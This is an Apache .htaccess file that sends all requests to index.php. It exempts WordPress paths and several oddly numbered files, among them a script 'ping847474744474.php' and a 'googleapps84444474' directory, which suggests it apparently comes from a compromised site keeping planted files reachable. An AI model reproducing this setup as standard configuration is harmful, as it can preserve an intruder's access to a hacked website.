RewriteEngine On

Options -Indexes

RewriteCond %{REQUEST_URI} !^/wp-admin/.*$

RewriteCond %{REQUEST_URI} !^/wp-includes/.*$

RewriteCond %{REQUEST_URI} !^/wp-content/.*$

RewriteCond %{REQUEST_URI} !^/wp-login.php$

RewriteCond %{REQUEST_URI} !^/googleapps84444474/.*$

RewriteCond %{REQUEST_URI} !^/ping847474744474/ping847474744474.php$

RewriteCond %{REQUEST_URI} !^/style.css$

RewriteCond %{REQUEST_URI} !^/style84747474.css$

RewriteCond %{REQUEST_URI} !^/style84.css$

RewriteCond %{REQUEST_URI} !^/search.png$

RewriteCond %{REQUEST_URI} !^/index.php$

RewriteRule .* index.php [L]

<ifModule mod_env.c>
  SetEnv KeepAlive On
  SetEnv KeepAliveTimeout 34
  SetEnv MaxKeepAliveRequests 146
</ifModule>

<ifModule mod_headers.c>
  Header unset Connection
  Header set Connection keep-alive

  Header unset Keep-Alive
  Header set Keep-Alive timeout=34,max=146
</ifModule>
